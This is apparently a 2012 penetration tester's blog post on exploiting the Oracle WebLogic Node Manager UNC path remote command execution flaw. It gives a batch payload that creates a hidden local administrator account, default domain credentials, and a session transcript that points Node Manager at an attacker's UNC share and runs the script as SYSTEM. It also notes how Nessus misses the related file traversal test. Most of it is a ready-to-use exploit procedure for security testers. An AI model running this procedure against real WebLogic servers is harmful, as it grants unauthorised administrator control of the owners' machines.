Oracle Web Logic Node Manager UNC Path Remote File Execution
Posted by admin on 2012/03/16 Leave a comment (0) Go to comments

Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.

The file traversal one is rubbish as you can’t specify any command line arguments AFAIK (Do tell me if I’m wrong, please).

The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the following…

    @ECHO OFF

    net user /add wlcetest WLCETest99*
    net localgroup administrators /add wlcetest

The username and password for the wl domain is weblogic / w3bl0g1c.

Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.

Here it is in action..

    user@host:~$ openssl s_client -connect 192.168.0.1:5556
    CONNECTED(00000003)
    <snip>
    —
    hello
    +OK Node manager v10.3 started
    domain cetest1 \\192.168.0.2\share
    +OK Current domain set to ‘cetest1′
    execscript addlocaladmin.bat
    +OK Script ‘addlocaladmin.bat’ executed

Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.

Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique can’t find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.